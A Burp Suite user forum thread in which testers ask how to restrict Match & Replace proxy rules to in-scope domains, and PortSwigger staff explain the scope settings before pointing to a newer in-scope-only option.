Burp Suite User Forum

Create new post

Match & Replace for In-Scope Only

Nadav | Last updated: Dec 03, 2020 10:06AM UTC

Hey, So I've been using Burp Suite, like usual, and suddenly, while testing, I noticed that my match & replace rules I've created are affecting out-of-scope domains, which makes a huge mess in the whole application, instead of where I need the mess to be. Is there an option to narrow the match & replace for only in-scope targets? If not, can you add this feature, please? Thanks.

Uthman, PortSwigger Agent | Last updated: Dec 03, 2020 10:45AM UTC

When you configure your scope, there is an option to ignore out of scope requests. Did you select 'Yes' for this? The Match and Replace rules should only apply to requests/responses passing through the Proxy but if you set your scope to block out of scope requests prior to this, you should not see any modification of out of scope requests (since they should not be captured by the proxy). Or do you want to capture out of scope requests but only apply the match and replace rules on in-scope ones?

Nadav | Last updated: Dec 03, 2020 11:24AM UTC

Thanks for the fast reply, Uthman. I set the scope and did click on "Yes" in the message. Then I saw the headline that says "Logging out-of-scope Proxy traffic is disabled" with the "Re-enable" button next to it. Although this, the Match & Replace still works on out-of-scope traffic. As far as I concern (don't want to say this in the name of all the researchers in the world), I'd like to totally ignore out-of-scope traffic. Don't want to see it (already happens) and don't want to edit it (unless I choose this specifically). Thanks.

Uthman, PortSwigger Agent | Last updated: Dec 03, 2020 11:28AM UTC

Thanks for the feedback. Do you have any evidence that out of scope traffic is subject to the match and replace rules? If the logging of that traffic is disabled, surely it should not be passing through the proxy. Are you saying that this is not working as intended either? Can you please send us an email with further feedback and screenshots? You can reach us at support@portswigger.net. Thanks a lot for your cooperation!

Nadav | Last updated: Dec 05, 2020 11:45AM UTC

I don't see the traffic of the out-of-scope domains, but yet, the Match & Replace rules affect them. I'll create a video and send it to your email.

Uthman, PortSwigger Agent | Last updated: Dec 07, 2020 08:29AM UTC

Thank you! We will take a look and get back to you directly via email.

mvks | Last updated: Apr 14, 2023 05:37PM UTC

Hi, did you find any solution to this? I have the same problem with Burp Suite Community Edition v2023.3.3 on mac os.

Michelle, PortSwigger Agent | Last updated: Apr 17, 2023 12:07PM UTC

Hi This is currently the expected behavior as the requests are passing through Burp Proxy. We have made a note of this idea so we can track how many people would find this useful, and we have added your vote to it. Do you need these to pass through Burp Proxy, or could they be passed straight through using the TLS pass through settings?

Mazen | Last updated: Jun 27, 2023 09:09AM UTC

I have the same problem Burp suite v2022.7.1 Can you please fix it ? I test for blind xss, I want only the In Scope domain that be affected, not the out of scope too

Michelle, PortSwigger Agent | Last updated: Jun 27, 2023 02:32PM UTC

Hi If you update to the latest version of Burp you'll find an option 'Only apply to in-scope items' under the Match and Replace rules.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.